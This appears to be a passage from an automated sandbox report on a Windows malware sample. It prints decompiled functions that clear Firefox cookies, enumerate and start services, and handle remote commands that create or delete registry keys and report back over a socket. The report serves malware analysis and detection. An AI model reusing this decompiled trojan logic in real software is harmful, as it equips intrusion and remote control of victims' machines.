                                    • FindClose.KERNEL32(00000000), ref: 0040A2BB
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040A2E5
                                    • DeleteFileA.KERNEL32(00000000,00000000), ref: 0040A38D
                                    • GetLastError.KERNEL32 ref: 0040A397
                                    • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040A3AB
                                    • FindClose.KERNEL32(00000000), ref: 0040A3D1
                                    • FindClose.KERNEL32(00000000), ref: 0040A3F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$Close$Next$DeleteErrorFirstLast
                                    • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                    • API String ID: 532992503-432212279
                                    • Opcode ID: 2c1ab3ee3b965990f416345f1d4c85d5ca13f1cb4dc72bdcb68ad7aa493db07d
                                    • Instruction ID: 2e8bce256a7dd72f22d157e061cccd6386a79eba79b63e076e2be11f32c05444
                                    • Opcode Fuzzy Hash: 2c1ab3ee3b965990f416345f1d4c85d5ca13f1cb4dc72bdcb68ad7aa493db07d
                                    • Instruction Fuzzy Hash: 5441B2309003195BCB14FBA5DC569EE7778AF11305F40017FF806B61D2EF385A99CA9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004160DB, Relevance: 15.2, APIs: 10, Instructions: 226serviceCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 94%
                                    			E004160DB(intOrPtr __ecx) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				struct _QUERY_SERVICE_CONFIG* _v24;
				void* _v28;
				intOrPtr _v32;
				short** _v36;
				intOrPtr _v40;
				char _v64;
				char _v88;
				char _v112;
				char _v136;
				struct _ENUM_SERVICE_STATUS _v172;
				void* __ebx;
				void* __edi;
				struct _ENUM_SERVICE_STATUS* _t87;
				void* _t100;
				void* _t107;
				int _t108;
				long _t110;
				void* _t133;
				intOrPtr _t198;
				short** _t199;
				int _t201;
				intOrPtr _t202;
				int _t203;

				_t198 = __ecx;
				_v40 = __ecx;
				_t133 = OpenSCManagerA(0, 0, 4);
				if(_t133 != 0) {
					L00401F6D(_t133,  &_v88);
					_v12 = 0;
					_v8 = 0;
					_v20 = 0;
					__eflags = EnumServicesStatusW(_t133, 0x3b, 3,  &_v172, 0,  &_v12,  &_v8,  &_v20);
					if(__eflags != 0) {
						L12:
						CloseServiceHandle(_t133);
						E0040331A(_t133, _t198, __eflags,  &_v88);
						L00401EF0();
						L13:
						return _t198;
					}
					__eflags = GetLastError() - 0xea;
					if(__eflags != 0) {
						goto L12;
					}
					_t201 = _v12;
					_push(_t201);
					_t87 = E004394F6( &_v88);
					_v36 = _t87;
					EnumServicesStatusW(_t133, 0x3b, 3, _t87, _t201,  &_v12,  &_v8,  &_v20);
					_t202 = 0;
					_v32 = 0;
					__eflags = _v8;
					if(__eflags <= 0) {
						L11:
						L004394F1(_v36);
						goto L12;
					}
					_t199 = _v36;
					do {
						E00403311(E00404405(_t133,  &_v112, _t199[1], __eflags, E0040427F(_t133,  &_v64, 0x4659c4)));
						L00401EF0();
						L00401EF0();
						E00403311(E00404405(_t133,  &_v64,  *_t199, __eflags, E0040427F(_t133,  &_v112, 0x4659c4)));
						L00401EF0();
						L00401EF0();
						_t100 = E0040427F(_t133,  &_v136, 0x4659c4);
						E00403311(E00403030( &_v64, E0041729F(_t133,  &_v112, _t199[3]), _t100));
						L00401EF0();
						L00401EF0();
						L00401EF0();
						_v16 = _v16 & 0x00000000;
						_t107 = OpenServiceW(_t133,  *_t199, 1);
						_v28 = _t107;
						_t108 = QueryServiceConfigW(_t107, _v24, 0,  &_v16);
						__eflags = _t108;
						if(_t108 == 0) {
							_t110 = GetLastError();
							__eflags = _t110 - 0x7a;
							if(_t110 == 0x7a) {
								_t203 = _v16;
								_push(_t203);
								_v24 = E004394F6( &_v16);
								_t204 = _v24;
								QueryServiceConfigW(_v28, _v24, _t203,  &_v16);
								E00403311(E004030A6(_t133,  &_v136, E0041729F(_t133,  &_v64,  *_v24), _t199, __eflags, 0x4659c4));
								L00401EF0();
								L00401EF0();
								E00403311(E004030A6(_t133,  &_v136, E0041729F(_t133,  &_v64,  *((intOrPtr*)(_t204 + 4))), _t199, __eflags, 0x4659c4));
								L00401EF0();
								L00401EF0();
								E00403311(E004030A6(_t133,  &_v136, E00404405(_t133,  &_v64,  *((intOrPtr*)(_t204 + 0xc)), __eflags, E0040427F(_t133,  &_v112, 0x4659c4)), _t199, __eflags, "\n"));
								L00401EF0();
								L00401EF0();
								L00401EF0();
								L004394F1(_t204);
								_t202 = _v32;
							}
						}
						CloseServiceHandle(_v28);
						_t202 = _t202 + 1;
						_t199 =  &(_t199[9]);
						_v32 = _t202;
						__eflags = _t202 - _v8;
					} while (__eflags < 0);
					_t198 = _v40;
					goto L11;
				}
				E0040427F(_t133, _t198, 0x45f724);
				goto L13;
			}






























                                    0x004160eb
                                    0x004160ef
                                    0x004160f8
                                    0x004160fc
                                    0x00416112
                                    0x0041611a
                                    0x00416121
                                    0x00416128
                                    0x0041613f
                                    0x00416141
                                    0x0041638a
                                    0x0041638b
                                    0x00416397
                                    0x0041639f
                                    0x004163a4
                                    0x004163ac
                                    0x004163ac
                                    0x0041614d
                                    0x00416152
                                    0x00000000
                                    0x00000000
                                    0x00416158
                                    0x0041615b
                                    0x0041615c
                                    0x00416165
                                    0x00416178
                                    0x0041617e
                                    0x00416180
                                    0x00416183
                                    0x00416186
                                    0x00416381
                                    0x00416384
                                    0x00000000
                                    0x00416389
                                    0x0041618c
                                    0x0041618f
                                    0x004161ad
                                    0x004161b5
                                    0x004161bd
                                    0x004161df
                                    0x004161e7
                                    0x004161ef
                                    0x004161ff
                                    0x0041621f
                                    0x00416227
                                    0x0041622f
                                    0x0041623a
                                    0x0041623f
                                    0x00416248
                                    0x00416251
                                    0x0041625b
                                    0x00416261
                                    0x00416263
                                    0x00416269
                                    0x0041626f
                                    0x00416272
                                    0x00416278
                                    0x0041627b
                                    0x00416282
                                    0x0041628a
                                    0x00416291
                                    0x004162b8
                                    0x004162c3
                                    0x004162cb
                                    0x004162f2
                                    0x004162fd
                                    0x00416305
                                    0x0041633b
                                    0x00416346
                                    0x0041634e
                                    0x00416356
                                    0x0041635c
                                    0x00416361
                                    0x00416364
                                    0x00416272
                                    0x00416368
                                    0x0041636e
                                    0x0041636f
                                    0x00416372
                                    0x00416375
                                    0x00416375
                                    0x0041637e
                                    0x00000000
                                    0x0041637e
                                    0x00416105
                                    0x00000000

                                    APIs
                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,?,0046BACC,0046C998), ref: 004160F2
                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,00415BDC,?), ref: 00416139
                                    • GetLastError.KERNEL32(?,0046BACC,0046C998), ref: 00416147
                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,00415BDC,?), ref: 00416178
                                    • OpenServiceW.ADVAPI32(00000000,?,00000001,00000000,004659C4,00000000,004659C4,00000000,004659C4,?,0046BACC,0046C998), ref: 00416248
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: EnumOpenServicesStatus$ErrorLastManagerService
                                    • String ID:
                                    • API String ID: 2247270020-0
                                    • Opcode ID: 2a95b1dc2d7ea87457b6892e2edf2988bf99cf90c0ea0d464b8aeb3cdcf6ae09
                                    • Instruction ID: 68473e94775990671fd8c6040cdbc231cd1f0957a3a8cd51887978b0f5e9c903
                                    • Opcode Fuzzy Hash: 2a95b1dc2d7ea87457b6892e2edf2988bf99cf90c0ea0d464b8aeb3cdcf6ae09
                                    • Instruction Fuzzy Hash: 7B814D71D00209AACB14EBA1DC929EEB739EF14345F10406EF916761D2EF386A09CB98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004163AD, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42serviceCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004163AD(char _a4) {
				void* _t5;
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t5 = OpenSCManagerW(0, 0, 0x10);
				_t1 =  &_a4; // 0x416033
				_t18 = _t5;
				_t17 = OpenServiceW(_t18, L00401EEB(_t1), 0x10);
				if(_t17 != 0) {
					_t14 = 0 | StartServiceW(_t17, 0, 0) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				L00401EF0();
				return _t14;
			}







                                    0x004163b5
                                    0x004163b9
                                    0x004163c1
                                    0x004163c4
                                    0x004163d3
                                    0x004163d7
                                    0x004163f4
                                    0x004163f7
                                    0x004163fa
                                    0x004163d9
                                    0x004163da
                                    0x004163da
                                    0x004163ff
                                    0x0041640a

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,?,00416033,00000000), ref: 004163B9
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,00416033,00000000), ref: 004163CD
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163DA
                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,00416033,00000000), ref: 004163E5
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163F7
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163FA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ManagerStart
                                    • String ID: 3`A
                                    • API String ID: 276877138-3175782522
                                    • Opcode ID: b01b844c620f2adba2967bf90f13e31907c9191db02da24ff555517433b69a50
                                    • Instruction ID: 62d5a2aa0acc4a9a23ffe864dccd2203370fbef9b686cd9ab08c2db04e146924
                                    • Opcode Fuzzy Hash: b01b844c620f2adba2967bf90f13e31907c9191db02da24ff555517433b69a50
                                    • Instruction Fuzzy Hash: 18F090311413187FD2116F659C88DBF3B6CDA41BE6B00002AF80592192CE68CE85A5B9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00411205, Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 479registrylibraryloaderCOMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 78%
                                    			E00411205(void* __edx, void* __eflags, char _a8) {
				char _v36;
				char _v48;
				char _v52;
				char _v68;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				struct _SECURITY_ATTRIBUTES _v104;
				char _v108;
				void* _v112;
				char _v120;
				intOrPtr _v124;
				char _v128;
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				void* _t88;
				void* _t99;
				void* _t101;
				void* _t102;
				void* _t104;
				signed int _t105;
				void* _t113;
				void* _t120;
				void* _t121;
				void* _t123;
				void* _t127;
				signed short* _t135;
				void* _t137;
				void* _t141;
				void* _t146;
				void* _t150;
				void* _t152;
				void* _t153;
				void* _t155;
				signed int _t156;
				intOrPtr* _t158;
				void* _t160;
				void* _t162;
				void* _t163;
				void* _t165;
				void* _t171;
				void* _t173;
				void* _t174;
				void* _t176;
				void* _t181;
				void* _t182;
				long _t185;
				signed short* _t195;
				void* _t205;
				void* _t217;
				void* _t233;
				void* _t247;
				signed int _t258;
				signed int _t313;
				signed int _t323;
				signed int _t326;
				void* _t328;
				void* _t330;
				void* _t335;
				void* _t337;
				void* _t339;
				signed int _t340;
				void* _t341;
				signed int _t347;
				signed int _t348;
				void* _t351;
				void* _t352;
				void* _t353;
				void* _t356;
				void* _t361;
				void* _t362;
				void* _t364;
				void* _t365;
				void* _t367;
				void* _t368;
				void* _t369;
				void* _t370;
				void* _t372;
				void* _t374;
				void* _t379;

				_t379 = __eflags;
				_t320 = __edx;
				_push(_t203);
				_t77 = L00401F95( &_a8);
				_push(0xffffffff);
				_t328 = 4;
				_push(_t328);
				_push( &_v52);
				E004042A6( &_a8);
				_t351 = (_t348 & 0xfffffff8) - 0x44;
				E004020EC(_t203, _t351, __edx, _t379, 0x46c238);
				_t352 = _t351 - 0x18;
				E004020EC(_t203, _t352, __edx, _t379,  &_v68);
				E00417478( &_v108, __edx);
				_t353 = _t352 + 0x30;
				_t335 =  *_t77 - 0x35;
				if(_t335 == 0) {
					L00401F6D(_t203,  &_v76);
					__eflags = E004021F5( &_v88) - 1;
					if(__eflags > 0) {
						L00409DC9(_t203,  &_v80, L00401F95(L00401E49( &_v88, _t320, __eflags, 1)));
					}
					E004020EC(_t203, _t353 - 0x18, _t320, __eflags, L00401E49( &_v88, _t320, __eflags, 0));
					_t88 = L00401EEB( &_v84);
					_t320 = 1;
					_t217 = _t88;
					L37:
					E00411046(_t217, _t320, _t386);
					L38:
					L00401EF0();
					L39:
					L00401E74( &_v88, _t320);
					L00401FC7();
					L00401FC7();
					return 0;
				}
				_t337 = _t335 - 1;
				if(_t337 == 0) {
					_t99 = L00401F95(L00401E49( &_v88, __edx, __eflags, 2));
					_t101 = L00401F95(L00401E49( &_v92, __edx, __eflags, 1));
					_t330 = 0;
					_t102 = L00401E49( &_v96, __edx, __eflags, 0);
					_t356 = _t353 - 0x18;
					E004020EC(_t203, _t356, _t320, __eflags, _t102);
					_t104 = L00410FB5(_t203, __eflags, _t99);
					_t320 = _t101;
					_t105 = L00410D5C(_t104, _t101);
					_t358 = _t356 + 0x18 - 0x18;
					_t233 = _t356 + 0x18 - 0x18;
					__eflags = _t105;
					if(__eflags == 0) {
						_push("2");
						L33:
						E00402084(_t203, _t233);
						L00404AA4(_t203, 0x46c700, _t320, __eflags);
						goto L39;
					}
					_push("1");
					L20:
					E00402084(_t203, _t233);
					L00404AA4(_t203, 0x46c700, _t320, __eflags);
					E004020EC(_t203, _t358 - 0x18, _t320, __eflags, L00401E49( &_v120, _t320, __eflags, _t330));
					_t113 = L00401F95(L00401E49( &_v128, _t320, __eflags, 1));
					_t320 = 0;
					E00411046(_t113, 0, __eflags);
					goto L39;
				}
				_t339 = _t337 - 1;
				if(_t339 == 0) {
					E0040427F(_t203,  &_v80, L00401F95(L00401E49( &_v88, __edx, __eflags, 1)));
					 *0x46bd64 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), "SHDeleteKeyW");
					_t120 = L00401EEB( &_v84);
					_t121 = L00401E49( &_v96, _t320, __eflags, 0);
					_t361 = _t353 - 0x18;
					E004020EC(_t203, _t361, _t320, __eflags, _t121);
					_t123 = L00410FB5(_t203, __eflags, _t120);
					_t362 = _t361 + 0x18;
					__eflags =  *0x46bd64(_t123);
					if(__eflags != 0) {
						_t247 = _t362 - 0x18;
						_push("9");
						L12:
						E00402084(_t203, _t247);
						L00404AA4(_t203, 0x46c700, _t320, __eflags);
						goto L38;
					}
					_t127 = E00402489();
					_t340 = 2;
					_t203 = L0041184C( &_v84, "\\", _t127 - _t340);
					__eflags = _t203 - 0xffffffff;
					if(__eflags != 0) {
						_t50 = _t203 + 1; // 0x1
						_push( ~(__eflags > 0) | _t50 * _t340);
						_v100 = E0042F4C6( ~(__eflags > 0) | _t50 * _t340, _t50 * _t340 >> 0x20, _t340, __eflags);
						_t135 = L00401EEB(E00407309( &_v84,  &_v36, 0, _t203));
						_t203 = _v112;
						_t323 = _v112 - _t135;
						__eflags = _t323;
						do {
							_t258 =  *_t135 & 0x0000ffff;
							 *(_t323 + _t135) = _t258;
							_t135 = _t135 + _t340;
							__eflags = _t258;
						} while (__eflags != 0);
						L00401EF0();
						_t137 = L00401E49( &_v96, _t323, __eflags, 0);
						_t364 = _t362 - 0x18;
						E004020EC(_t203, _t364, _t323, __eflags, _t137);
						_t320 = 0;
						__eflags = 0;
						E00411046(_t203, 0, 0);
						E0042F4CF(_t203);
						_t365 = _t364 + 0x1c;
						L28:
						_t247 = _t365 - 0x18;
						_push("8");
						goto L12;
					}
					_t141 = L00401E49( &_v96, _t320, __eflags, 0);
					_t367 = _t362 - 0x18;
					E004020EC(_t203, _t367, _t320, __eflags, _t141);
					_t320 = 0;
					E00411046(0, 0, __eflags);
					_t365 = _t367 + 0x18;
					goto L28;
				}
				_t341 = _t339 - 1;
				if(_t341 == 0) {
					_t146 = L00436769(_t144, L00401F95(L00401E49( &_v88, __edx, __eflags, 3)));
					__eflags = _t146 - _t328;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(L00401F95(L00401E49( &_v92, __edx, __eflags, _t328)))));
						_t150 = L00401F95(L00401E49( &_v92, __edx, __eflags, 2));
						_t152 = L00401F95(L00401E49( &_v96, _t320, __eflags, 1));
						_t330 = 0;
						__eflags = 0;
						_t153 = L00401E49( &_v100, _t320, 0, 0);
						_t368 = _t353 - 0x18;
						E004020EC(_t203, _t368, _t320, __eflags, _t153);
						_t155 = L00410FB5(_t203, __eflags, _t150);
						_t369 = _t368 + 0x18;
						_t320 = _t152;
						_t156 = L00410BF8(_t155, _t152);
					} else {
						__eflags = _t146 - 0xb;
						if(__eflags == 0) {
							_t158 = L00401F95(L00401E49( &_v92, __edx, __eflags, _t328));
							_t160 = L00401F95(L00401E49( &_v92, __edx, __eflags, 2));
							_t162 = L00401F95(L00401E49( &_v96, _t320, __eflags, 1));
							_t330 = 0;
							_t163 = L00401E49( &_v100, _t320, __eflags, 0);
							_t370 = _t353 - 0x18;
							E004020EC(_t203, _t370, _t320, __eflags, _t163);
							_t165 = L00410FB5(_t203, __eflags, _t160);
							_t320 = _t162;
							_t156 = L00410C3C(_t165, _t162,  *_t158,  *((intOrPtr*)(_t158 + 4)));
							_t369 = _t370 + 0x24;
						} else {
							_push(_t146);
							L00401E49( &_v92, __edx, __eflags, _t328);
							_push(E00402489());
							_push(L00401F95(L00401E49( &_v92, __edx, __eflags, _t328)));
							_t171 = L00401F95(L00401E49( &_v96, _t320, __eflags, 2));
							_t173 = L00401F95(L00401E49( &_v100, _t320, __eflags, 1));
							_t330 = 0;
							_t174 = L00401E49( &_v104, _t320, __eflags, 0);
							_t372 = _t353 - 0x18;
							E004020EC(_t203, _t372, _t320, __eflags, _t174);
							_t176 = L00410FB5(_t203, __eflags, _t171);
							_t320 = _t173;
							_t156 = L00410B08(_t176, _t173);
							_t369 = _t372 + 0x28;
						}
					}
					_t358 = _t369 - 0x18;
					_t233 = _t369 - 0x18;
					__eflags = _t156;
					if(__eflags == 0) {
						_push("5");
						goto L33;
					} else {
						_push("4");
						goto L20;
					}
				}
				_t384 = _t341 != 1;
				if(_t341 != 1) {
					goto L39;
				}
				E0040427F(_t203,  &_v80, L00401F95(L00401E49( &_v88, __edx, _t384, 1)));
				_t181 = L00401EEB( &_v84);
				_t182 = L00401E49( &_v96, __edx, _t384, 0);
				_t374 = _t353 - 0x18;
				E004020EC(_t203, _t374, __edx, _t384, _t182);
				_t185 = RegCreateKeyExW(L00410FB5(_t203, _t384, _t181), 0, 0, 0, 0x20006, 0,  &_v104, 0, ??);
				RegCloseKey(_v112);
				_t376 = _t374 + 0x18 - 0x18;
				_t247 = _t374 + 0x18 - 0x18;
				_t385 = _t185;
				if(_t185 != 0) {
					_push("7");
					goto L12;
				}
				E00402084(_t203, _t247, "6");
				_push(0x72);
				L00404AA4(_t203, 0x46c700, _t320, _t385);
				_t205 = E00407323( &_v108, 0x46c700, 0x46c700);
				_t386 = _t205 - 0xffffffff;
				if(_t205 != 0xffffffff) {
					_t14 = _t205 + 1; // 0x1
					_t347 = 2;
					_push( ~(__eflags > 0) | _t14 * _t347);
					_v112 = E0042F4C6( ~(__eflags > 0) | _t14 * _t347, _t14 * _t347 >> 0x20, _t347, __eflags);
					_t195 = L00401EEB(E00407309( &_v96,  &_v48, 0, _t205));
					_t206 = _v124;
					_t326 = _v124 - _t195;
					__eflags = _t326;
					do {
						_t313 =  *_t195 & 0x0000ffff;
						 *(_t326 + _t195) = _t313;
						_t195 = _t195 + _t347;
						__eflags = _t313;
					} while (__eflags != 0);
					L00401EF0();
					E004020EC(_t206, _t376 - 0x18, _t326, __eflags, L00401E49( &_v108, _t326, __eflags, 0));
					_t320 = 0;
					E00411046(_t206, 0, __eflags);
					E0042F4CF(_t206);
					goto L38;
				}
				E004020EC(_t205, _t376 - 0x18, _t320, _t386, L00401E49( &_v108, _t320, _t386, 0));
				_t320 = 0;
				_t217 = 0;
				goto L37;
			}

























































































                                    0x00411205
                                    0x00411205
                                    0x00411211
                                    0x00411214
                                    0x00411219
                                    0x0041121d
                                    0x00411223
                                    0x00411228
                                    0x00411229
                                    0x0041122e
                                    0x00411238
                                    0x0041123d
                                    0x00411247
                                    0x00411250
                                    0x00411255
                                    0x00411258
                                    0x0041125b
                                    0x0041176b
                                    0x00411779
                                    0x0041177c
                                    0x00411795
                                    0x00411795
                                    0x004117ab
                                    0x004117b4
                                    0x004117b9
                                    0x004117bb
                                    0x004117bd
                                    0x004117bd
                                    0x004117c5
                                    0x004117c9
                                    0x004117ce
                                    0x004117d2
                                    0x004117db
                                    0x004117e3
                                    0x004117f0
                                    0x004117f0
                                    0x00411261
                                    0x00411264
                                    0x004116f9
                                    0x0041170c
                                    0x00411711
                                    0x0041171a
                                    0x0041171f
                                    0x00411725
                                    0x0041172a
                                    0x00411732
                                    0x00411736
                                    0x0041173c
                                    0x0041173f
                                    0x00411741
                                    0x00411743
                                    0x0041174f
                                    0x00411754
                                    0x00411754
                                    0x00411760
                                    0x00000000
                                    0x00411760
                                    0x00411745
                                    0x0041154e
                                    0x0041154e
                                    0x0041155a
                                    0x0041156f
                                    0x00411581
                                    0x00411586
                                    0x0041158a
                                    0x00000000
                                    0x0041158f
                                    0x0041126a
                                    0x0041126d
                                    0x004115b8
                                    0x004115d8
                                    0x004115dd
                                    0x004115ea
                                    0x004115ef
                                    0x004115f5
                                    0x004115fa
                                    0x004115ff
                                    0x00411609
                                    0x0041160b
                                    0x004116e0
                                    0x004116e2
                                    0x004113c2
                                    0x004113c2
                                    0x004113ce
                                    0x00000000
                                    0x004113ce
                                    0x00411615
                                    0x0041161c
                                    0x0041162e
                                    0x00411630
                                    0x00411633
                                    0x0041165a
                                    0x00411666
                                    0x0041166e
                                    0x00411683
                                    0x00411688
                                    0x0041168e
                                    0x0041168e
                                    0x00411690
                                    0x00411690
                                    0x00411693
                                    0x00411697
                                    0x00411699
                                    0x00411699
                                    0x004116a2
                                    0x004116ac
                                    0x004116b1
                                    0x004116b7
                                    0x004116bc
                                    0x004116bc
                                    0x004116c0
                                    0x004116c6
                                    0x004116cb
                                    0x004116ce
                                    0x004116d1
                                    0x004116d3
                                    0x00000000
                                    0x004116d3
                                    0x0041163a
                                    0x0041163f
                                    0x00411645
                                    0x0041164a
                                    0x0041164e
                                    0x00411653
                                    0x00000000
                                    0x00411653
                                    0x00411273
                                    0x00411276
                                    0x004113eb
                                    0x004113f5
                                    0x004113f7
                                    0x004114f1
                                    0x004114fc
                                    0x0041150f
                                    0x00411514
                                    0x00411514
                                    0x0041151d
                                    0x00411522
                                    0x00411528
                                    0x0041152d
                                    0x00411532
                                    0x00411535
                                    0x00411539
                                    0x004113fd
                                    0x004113fd
                                    0x00411400
                                    0x00411482
                                    0x00411499
                                    0x004114ac
                                    0x004114b1
                                    0x004114ba
                                    0x004114bf
                                    0x004114c5
                                    0x004114ca
                                    0x004114d2
                                    0x004114d6
                                    0x004114db
                                    0x00411402
                                    0x00411402
                                    0x00411404
                                    0x00411410
                                    0x00411422
                                    0x00411430
                                    0x00411443
                                    0x00411448
                                    0x00411451
                                    0x00411456
                                    0x0041145c
                                    0x00411461
                                    0x00411469
                                    0x0041146d
                                    0x00411472
                                    0x00411472
                                    0x00411400
                                    0x00411540
                                    0x00411543
                                    0x00411545
                                    0x00411547
                                    0x00411597
                                    0x00000000
                                    0x00411549
                                    0x00411549
                                    0x00000000
                                    0x00411549
                                    0x00411547
                                    0x0041127c
                                    0x0041127f
                                    0x00000000
                                    0x00000000
                                    0x0041129c
                                    0x004112b6
                                    0x004112c1
                                    0x004112c6
                                    0x004112cc
                                    0x004112da
                                    0x004112e6
                                    0x004112ec
                                    0x004112ef
                                    0x004112f1
                                    0x004112f3
                                    0x004113bd
                                    0x00000000
                                    0x004113bd
                                    0x004112fe
                                    0x00411303
                                    0x0041130a
                                    0x0041131a
                                    0x0041131c
                                    0x0041131f
                                    0x00411341
                                    0x00411346
                                    0x00411350
                                    0x00411358
                                    0x0041136d
                                    0x00411372
                                    0x00411378
                                    0x00411378
                                    0x0041137a
                                    0x0041137a
                                    0x0041137d
                                    0x00411381
                                    0x00411383
                                    0x00411383
                                    0x0041138c
                                    0x004113a1
                                    0x004113a6
                                    0x004113aa
                                    0x004113b0
                                    0x00000000
                                    0x004113b5
                                    0x00411331
                                    0x00411336
                                    0x00411338
                                    0x00000000

                                    APIs
                                    • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004112DA
                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004112E6
                                      • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                    • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004115C7
                                    • GetProcAddress.KERNEL32(00000000), ref: 004115CE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseCreateLibraryLoadProcsend
                                    • String ID: SHDeleteKeyW$Shlwapi.dll
                                    • API String ID: 2127411465-314212984
                                    • Opcode ID: 85830c285fda22642963a2c44f2ad4dcb9a4aac340446b9a8848ea33e97687ea
                                    • Instruction ID: 42533e532c22dbc36938cc4a5415c4332dc933708f84597f9d810698dd7565cc
                                    • Opcode Fuzzy Hash: 85830c285fda22642963a2c44f2ad4dcb9a4aac340446b9a8848ea33e97687ea
                                    • Instruction Fuzzy Hash: B4E1D171A043005BCA14B7B6CC5B9BF76A95B95708F40052FFA42B71F3EE7C8948869A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044D3FA, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 77%
                                    			E0044D3FA(void* __ebx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v0;
				signed int _v8;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _v2424;
				void* __edi;
				void* __esi;
				signed int _t725;
				signed int _t735;
				signed int _t736;
				signed int _t740;
				intOrPtr _t742;
				intOrPtr* _t743;
				intOrPtr* _t746;
				signed int _t751;
				signed int _t752;
				signed int _t758;
				signed int _t764;
				intOrPtr _t766;
				void* _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t778;
				signed int _t779;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t799;
				signed int _t800;
				signed int _t805;
				signed int _t806;
				signed int _t809;
				signed int _t813;
				signed int _t820;
				signed int* _t823;
				signed int _t826;
				signed int _t837;
				signed int _t838;
				signed int _t840;
				char* _t841;
				signed int _t843;
				signed int _t847;
				signed int _t848;
				signed int _t852;
				signed int _t854;
				signed int _t859;
				signed int _t867;
				signed int _t870;
				signed int _t872;
				signed int _t875;
				signed int _t876;
				signed int _t877;
				signed int _t880;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				char* _t897;
				signed int _t899;
				signed int _t903;
				signed int _t904;
				signed int* _t906;
				signed int _t908;
				signed int _t910;
				signed int _t915;
				signed int _t922;
				signed int _t925;
				signed int _t929;
				signed int* _t936;
				intOrPtr _t938;
				void* _t939;
				intOrPtr* _t941;
				signed int* _t945;
				unsigned int _t956;
				signed int _t957;
				void* _t960;
				signed int _t961;
				void* _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t974;
				signed int _t979;
				signed int _t982;
				unsigned int _t985;
				signed int _t986;
				void* _t989;
				signed int _t990;
				void* _t992;
				signed int _t993;
				signed int _t994;
				signed int _t995;
				signed int _t999;
				signed int* _t1004;
				signed int _t1006;
				signed int _t1016;
				void _t1019;
				signed int _t1022;
				void* _t1025;
				signed int _t1036;
				signed int _t1037;
				signed int _t1040;
